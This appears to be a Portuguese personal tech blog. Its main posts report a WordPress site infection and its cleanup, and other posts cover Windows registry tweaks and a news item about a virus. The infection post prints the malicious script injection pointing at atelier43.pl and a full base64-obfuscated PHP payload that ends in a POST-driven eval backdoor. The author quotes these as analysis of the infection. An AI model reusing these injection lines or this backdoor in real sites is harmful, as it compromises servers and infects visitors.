Problema Resolvido

O problema que relatei aqui foi resolvido.

Não encontrei a causa por isso posso continuar á mercê dos hackaros, mas pelo menos para já os sites estão limpos (este blogue está alojado noutro provider e não foi afectado).

O processo de limpeza foi simples mas demorado, comecei por fazer download de todos os ficheiros que tinha na conta afectada, pagar numa instalação “virgem” do WordPress e copiar para cima dos ficheiros já existentes, de cada instalação que tenho do WordPress. Mesmo assim continuava a haver ficheiros infectados. Fiz uma pequena aplicação em C# que pesquisa recursivamente todos os ficheiros pelo código injectado e o apaga copiando para outro directorio os ficheiros “limpos”.

Se alguém padecer do mesmo mal, que esteja á vontade para me solicitar o código que usei para percorrer todos os ficheiros em todos os directórios e sub-directórios e encontrar os ficheiros afectados. Não disponibilizo aqui a aplicação porque está um bocado tosca, para a usar convém ler o código e ajustar á infecção que os ficheiros tiverem.

Aviso: Visitar este site poderá danificar o seu computador!

PrtSc Aviso do Chrome

Embora o Chrome não seja o browser que uso no dia a dia, ganhou mais um ponto na minha consideração. É o browser que arranca mais rapidamente no meu pc, dai quando preciso se ir á net e não posso esperar que abra outro browser abra utilizo-o. Hoje ao abrir recebi um erro que está na imagem:

O Web site em antoniocampos.net contém elementos do site atelier43.pl, o qual parece alojar software maligno ““ ou seja, software que pode danificar o seu computador ou funcionar sem o seu consentimento. A mera visita a um site que contenha software maligno pode infectar o seu computador.

Para obter informações mais detalhadas sobre os problemas com estes elementos, visite a Página de diagnóstico Navegação segura no Google para atelier43.pl.

 

depois de olha para o código fonte vi que de alguma forma foi injectado código no ficheiro original, o código malicioso inserido foi o seguinte:

<script src=http://atelier43.pl/images/gifimg.php ></script>

Logo a seguir ao fecho da tag </head>, visitei outros dominios todos alojados no mesmo sitio e todos os dominios tinham o mesmo sintoma, depois de uma analise cuidada reparei que havia vários ficheiros infectados pela injecção, conforme a extenssão do ficheiro tinham código diferente.

Nos ficheiros de javascript (.js):

document.write(‘<script src=http://atelier43.pl/images/gifimg.php ><\/script>’);

Nos ficheiros html aparecia o código já descrito em cima e nos ficheiros .php o seguinte código:

<?php eval(base64_decode(‘aWYoIWZ1bmN0aW9uX2V4aXN0cygncHEzazcnKSl7ZnVuY3Rpb24gcHEzazcoJHMpe2lmKH

ByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWF

jaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRj

aCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF

0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFx

iIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2

RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRja

F9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXM

nLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aF

xzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc

3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycp

LicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlK

CdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkYwWld4cFpYSTBNeTV3YkM5cGJXRm5aW

E12WjJsbWFXMW5MbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCR

zLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHM

sMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24

gcHEzazcyKCRhLCRiLCRjLCRkKXtnbG9iYWwkcHEzazcxOyRzPWFycmF5KCk7aWYoZnVuY3R

pb25fZXhpc3RzKCRwcTNrNzEpKWNhbGxfdXNlcl9mdW5jKCRwcTNrNzEsJGEsJGIsJGMsJGQ

pO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3B

xM2s3JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1h

cnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bn

QoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9

jbGVhbigpO31vYl9zdGFydCgncHEzazcnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2J

fc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kcHEzazdsPSgoJGE9QHNldF9lcnJ

vcl9oYW5kbGVyKCdwcTNrNzInKSkhPSdwcTNrNzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY2

9kZSgkX1BPU1RbJ2UnXSkpOw==’)); ?>

Este é o código responsavel por infectar os ficheiros se fizerem um base64_decode e analisarem o código aparece a forma como os ficheiros foram infectados, mas não explica como o código “entrou” pela primeira vez.

Além das infecções referidas foram craidos vários ficheiros, com vários nomes que aguardam o POST código php e o executam no servidor, deixando assim todos os ficheiros a que o utilizador que está a correr o site vulneraveis.

Depois de várias pesquisas no Google tudo aponta para uma falha no WordPress embora não tenha descoberto em que versão, penso que deverá ser na 2.8.6 pois nessa conta de alojamento tenho 3 instalações de wordpress todas actualizadas para a 2.8.6. Segundo a sabedoria do Google não fui o primeiro a ser infectado por esta praga, embora dos artigos que encontrei no google não sejam os mesmos, a infecção e a presença de código malicioso é semelhante á que me aconteceu.

Por isso aconselho todos os que tem sites em WordPress que verifiquem se estão infectados.

Estou a descarregar todos os ficheiros que tenho alojados neste servidor para analisar mais atentamente o que aconteceu, creio que não vou chegar a nenhuma conclusão de como fui infectado uma vez que não tenho acesso aos logs do apache, mas no minimo vou ter que limpar todos os ficheiros.

Uma das soluções seria apagar todos os ficheiros da instalação e colar uma versão nova de todos os ficheiros, mas isso fará com que todas as costumizações de temas e plugins se percam, e obrigaria á instalação de todos os plugins novamente.

Mal haja desolvimentos sobre a solução (pelo menos da limpeza dos ficheiros) crio um novo post com os mesmos.

Alterar OEM Logo Windows Vista

O OEM Logo é a imagem que aperece quando se entra nas propiedades do sistema e onde tem o indice de Experiencia, geralmente quando aparece ai uma imagem é do fabricante do computador.

Para aqueles que não querem fazer publicidade a outros ou querem colocar ai o seu logotipo, basta criar uma imagem .bmp e colocar por exemplo na pasta c:\windows\system32\ (assim garantem que está sempre disponivel), depois no inciar escrever regedit.exe e em seguida navegar até encontrar a chave com o nome WindowsExperienceIndexOemInf o caminho completo é HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winsat se a chave não existir tem que ser criada para permitir alterar a imagem. Depois de encontrar a chave clicar duas vezes (para editar) e escrever o caminho para a imagem que guardaram anteriormente e só isto.

Atenção: Mexer no Registry pode danificar o computador por isso isto não deve ser feito por quem não esteja familiarizado com o mesmo. Mas ligar um computador com Windows também o pode danificar por isso, façam!!!!

Hackers atacam Ministério da Justiça, Brisa e PT

Um estirpe rara do virus da gripe atacou várias entidades publicas portuguesas:

O Instituto de Tecnologias de Informação na Justiça  admitiu esta quinta-feira que um “novo virus” invadiu o sistema da PJ, mas garantiu não ter sido roubada “qualquer informação”. O mesmo virus terá atacado também a Brisa e a PT.

“Os únicos efeitos desta ocorrência foram a maior lentidão e a ocasional indisponibilidade de apenas alguns sistemas, nunca tendo estado em causa a perda de qualquer informação”, disse o ITIJ, na breve resposta dada ao pedido de esclarecimentos do JN. Ao ITIJ cabe a gestão e controlo de toda a área informática do Ministério da Justiça, bem como uma parte da sua vigilância, pelo que é a primeira barreira contra os piratas. O virus entrou no sistema do Ministério, mas não terá causado danos de monta, porque foi prontamente atacado.

O mesmo novo virus terá atacado também os sistemas da Brisa e a PT, segundo apurou o JN, mas ambas as empresas optaram pelo silêncio quando questionadas pelo nosso jornal.

Sobre a situação na Judiciária, a primeira a ser tornada pública, “há um ou outro PC que tem de ser limpo”, admitiu fonte da direcção da Policia, mas insistindo que “não houve quebra de segurança e perda de qualquer informação”.

(…)

Roubado descaradamente da página do JN

Queriam que os piratas ou o “novo virus” deixasse um ficheiro .docx com uma lista ordenada do que roubou??

Não saber o que foi retirado sistema é grave, e prova que não existe nenhum tipo de monitorização, isto assusta porque se um funcionário, por algum motivo repara que tem permissões indevidas, pode perfeitamente levar uma pen e copiar a informação que lhe apetecer para estudar em casa, sem deixar nenhum vestigio. Em casos de dados criticos acho que todas as normas de segurança e todas as monitorizações nunca são de mais, o inimigo pode estar do lado de dentro.

Este género de situações não devem ser remedeadas devem ser prevenidas, posso recomendar algumas pessoas em Portugal que pelo budget certo evitariam situações como esta!!!

Windows Live Messenger Multi

Ultimamente tenho experimentado alguns serviços da Microsoft, estes senhores até têm umas coisas engraçadas e que podem ser úteis, o conhecimento e a inspiração nunca é demais!!

Hoje para testar funcionalidades do Windows Live Messenger surgiu-me a necessidade de ter mais do que um cliente na minha máquina de testes depois de Googlar um bocado cheguei á conclusão que para ter várias instâncias do Messenger a correr basta criar uma chave no registo que indica ao programa que deve permitir múltiplas instâncias.

Para facilitar criei um ficheiro reg que adiciona a chave necessária ao registry (Download do Ficheiro Reg) para utilizar deve fechar completamente o Messenger e efectuar o download deste ficheiro, executar e aceitar que a chave seja adicionada ao messenger. A versão em que testei é a versão 2009 que ainda é beta e está disponivel aqui.